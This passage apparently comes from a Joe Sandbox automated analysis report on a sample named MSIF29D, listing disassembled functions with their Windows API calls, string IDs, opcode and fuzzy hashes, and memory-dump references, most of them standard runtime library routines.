                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3931714976-0
                                                                                                                                                                                                                                                                      • Opcode ID: ac829f45010975d5b1d1754c4cbd73014f228319050e428029e5a41a5e2307cd
                                                                                                                                                                                                                                                                      • Instruction ID: 1ffe6151f0b0e1cedc087f01821572cc640d25b5a6d66872fe25c13c48a47b5b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac829f45010975d5b1d1754c4cbd73014f228319050e428029e5a41a5e2307cd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F51D171900209DFDB21CF99C980BEEBBB4FF04354F244599E455AB381DBB99E05EB81
                                                                                                                                                                                                                                                                      Function 00FBB700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB731
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB74F
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB777
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,00000000,8F6E4A30,?,00000000,00000000), ref: 00FBB7CF
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBB863
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB88D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3931714976-0
                                                                                                                                                                                                                                                                      • Opcode ID: 98846f009cf9d96c25a8e85cb5555f03a96ead1f4a22e3094713ebc332eb267c
                                                                                                                                                                                                                                                                      • Instruction ID: 02e479b04d35b8e15d02aca92867acf385178a5328d4a0e8db1a69cbf7b4107c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98846f009cf9d96c25a8e85cb5555f03a96ead1f4a22e3094713ebc332eb267c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4251AE71904255DFCB21CF99C941BAEBBB4EF04324F24855DE845AB381DBB9AA41EF80
                                                                                                                                                                                                                                                                      Function 00FE0351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                      • API String ID: 3509577899-3206640213
                                                                                                                                                                                                                                                                      • Opcode ID: 99b11d29f1bac0141f81ef16a2e1147899b3539a4ad7f7300898f97c5c2b10fd
                                                                                                                                                                                                                                                                      • Instruction ID: 941a17cf23a5d6bbe5a4771eaf3e485bf7602e08dfa8f1f30dd80420c6bb18aa
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99b11d29f1bac0141f81ef16a2e1147899b3539a4ad7f7300898f97c5c2b10fd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41C11335D00286DBCB24CF6AC984BBA77B1FF45320F184049E505AB290DBB5ADC1EF61
                                                                                                                                                                                                                                                                      Function 00FD5978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00FD596F,00FD4900,00FD358F), ref: 00FD5986
                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD5994
                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD59AD
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00FD596F,00FD4900,00FD358F), ref: 00FD59FF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                      • Opcode ID: 49455d511ccebbd7efc33e7ddc812d965af06488a114816927fb8aafd44cbfe0
                                                                                                                                                                                                                                                                      • Instruction ID: af5c74e0f40cda8df90ef92d3a7121c85838bacb1a71d7d974cc7a7fba9dc3c4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49455d511ccebbd7efc33e7ddc812d965af06488a114816927fb8aafd44cbfe0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01B533609B119FE63527746D95A6B3756DB42B75728032BF414843E4EE264C01F681
                                                                                                                                                                                                                                                                      Function 00FB3230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,8F6E4A30,?,00000004), ref: 00FB3294
                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,00000000), ref: 00FB354A
                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00FB3592
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00FB1AF7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00FB1B7D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB2E60: LocalFree.KERNEL32(?,8F6E4A30,?,?,00FF3C40,000000FF,?,00FB1242,8F6E4A30,?,?,00FF3C75,000000FF), ref: 00FB2EB1
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                                                                                                                      • String ID: URL$url
                                                                                                                                                                                                                                                                      • API String ID: 853893950-346267919
                                                                                                                                                                                                                                                                      • Opcode ID: 863164d85df8734386a4db873272a2f5bdae2185e1adc7c5cb45e68267cec0b8
                                                                                                                                                                                                                                                                      • Instruction ID: 1ed81d2f115f2e0b3e85bd087be22e2cd95282907ed803fae90fbde824f294b0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 863164d85df8734386a4db873272a2f5bdae2185e1adc7c5cb45e68267cec0b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78C19830D14268DADB25DF29CC98BDDBBB4BF14304F1442D9D009A7291EBB86B88DF91
                                                                                                                                                                                                                                                                      Function 00FB36D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00FB3735
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00FF4215,000000FF), ref: 00FB381A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB2310: GetProcessHeap.KERNEL32 ref: 00FB2365
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00FB3778,-00000010,?,?,?,00FF4215,000000FF), ref: 00FB4736
                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00FB37C6
                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00FF4215,000000FF), ref: 00FB37DB
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                                                                                      • API String ID: 3941625479-2227199552
                                                                                                                                                                                                                                                                      • Opcode ID: 540940d0160a303f3073386da294a0febdfcc1277b03cc75b90317627d34406c
                                                                                                                                                                                                                                                                      • Instruction ID: ea45f99d583147ce09e5b17e4e5bfa746d74997fe05c87d6ca8af296539d4c64
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 540940d0160a303f3073386da294a0febdfcc1277b03cc75b90317627d34406c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D271A40609AFDB10DF69CC59BEEB7A4FF04310F144629F916972C1EBB4AA04DF91
                                                                                                                                                                                                                                                                      Function 00FB621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB1A20: LocalFree.KERNEL32(?), ref: 00FB1A42
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00FB1434,?,?,00FBD341,00FB1434,01008B5C,?,00FB1434,?,00000000), ref: 00FD3EBA
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(8F6E4A30,8F6E4A30,?,?,00000000,00FF4981,000000FF), ref: 00FB62EB
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: EnterCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CA3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CE0
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00FB62B0
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FB62B7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                                                                                                                      • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                                      • API String ID: 1333104975-3789238822
                                                                                                                                                                                                                                                                      • Opcode ID: 1f7660742885ab587b46e38ef72bf6fd82e502348c4adc55e19472a9f78bbd9a
                                                                                                                                                                                                                                                                      • Instruction ID: 7c0a0152d97d2e93c8bdc943986aa47383957d868cf27187ac3f9482c555967d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f7660742885ab587b46e38ef72bf6fd82e502348c4adc55e19472a9f78bbd9a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21A171D042059BDB21EF95DD06B9DB7A8EB08720F140629F961E72C0DB796900EF51
                                                                                                                                                                                                                                                                      Function 00FC8451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                                      • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                                      • Opcode ID: ffd3b11bc6012dfc9aa57b0153aa9e34ac9be129489e7bfafa50113e5d35ffc2
                                                                                                                                                                                                                                                                      • Instruction ID: d2ef6acfb7ce0fac60fec98ac85ce3a120aa6e5be791c2d1cd7e2031c0169055
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffd3b11bc6012dfc9aa57b0153aa9e34ac9be129489e7bfafa50113e5d35ffc2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5221F4B1804B936ED725DF74C881B7BBEF8AB09301F04495EE059C7A42D738E602DB90
                                                                                                                                                                                                                                                                      Function 00FB6250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(8F6E4A30,8F6E4A30,?,?,00000000,00FF4981,000000FF), ref: 00FB62EB
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: EnterCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CA3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CE0
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00FB62B0
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FB62B7
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                                                                                                                      • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                                      • API String ID: 2056477612-3789238822
                                                                                                                                                                                                                                                                      • Opcode ID: 5344650cbab7f3560958dbc3f13d541c5d8f563134f6a9051d2a077eb000511b
                                                                                                                                                                                                                                                                      • Instruction ID: 28cc743e6c9959b84ab40bdaa53f9321f4b2b2d3b0314249b28806883af23bd9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5344650cbab7f3560958dbc3f13d541c5d8f563134f6a9051d2a077eb000511b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70119072D04718DFDB21CF54ED05BA9B7A8EB18720F04066AE825E37C0EB7A6900DB51
                                                                                                                                                                                                                                                                      Function 00FD69E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00FD6AA3,?,?,0100DDCC,00000000,?,00FD6BCE,00000004,InitializeCriticalSectionEx,00FF97E8,InitializeCriticalSectionEx,00000000), ref: 00FD6A72
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: cbfca6227021c31338be2b86b4e614bf6fe75c3b46e36ea3656ec2b2aedc4c48
                                                                                                                                                                                                                                                                      • Instruction ID: b07a8fbb6f4e6dd0104b962329500c605bc1ac1005f611f580a89eeb271ea055
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbfca6227021c31338be2b86b4e614bf6fe75c3b46e36ea3656ec2b2aedc4c48
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8110A32E04725ABCF229B689C4076973999F02770F184152F954FB3C0D774ED00E6D5
                                                                                                                                                                                                                                                                      Function 00FE2DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8F6E4A30,?,?,00000000,00FF6A6C,000000FF,?,00FE2DC1,?,?,00FE2D95,?), ref: 00FE2E23
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FE2E35
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00FF6A6C,000000FF,?,00FE2DC1,?,?,00FE2D95,?), ref: 00FE2E57
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                      • Opcode ID: fc582bb4909d2ef8e6e512ad102de43a736d10a4d05e4a098a08d5ba466809a5
                                                                                                                                                                                                                                                                      • Instruction ID: 6290fb177e09e7a3fad43010bb1478fa9cbb07e55971bf567ccf6ca1fd546b55
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc582bb4909d2ef8e6e512ad102de43a736d10a4d05e4a098a08d5ba466809a5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701A27290866DABDB129F40CC05FBFBBBCFF04B20F000525F811A22E0DB759900DA80
                                                                                                                                                                                                                                                                      Function 00FE6DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FE6E40
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FE6F01
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FE6F68
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE5BDC: HeapAlloc.KERNEL32(00000000,00000000,00FE3841,?,00FE543A,?,00000000,?,00FD6CE7,00000000,00FE3841,00000000,?,?,?,00FE363B), ref: 00FE5C0E
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FE6F7D
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FE6F8D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
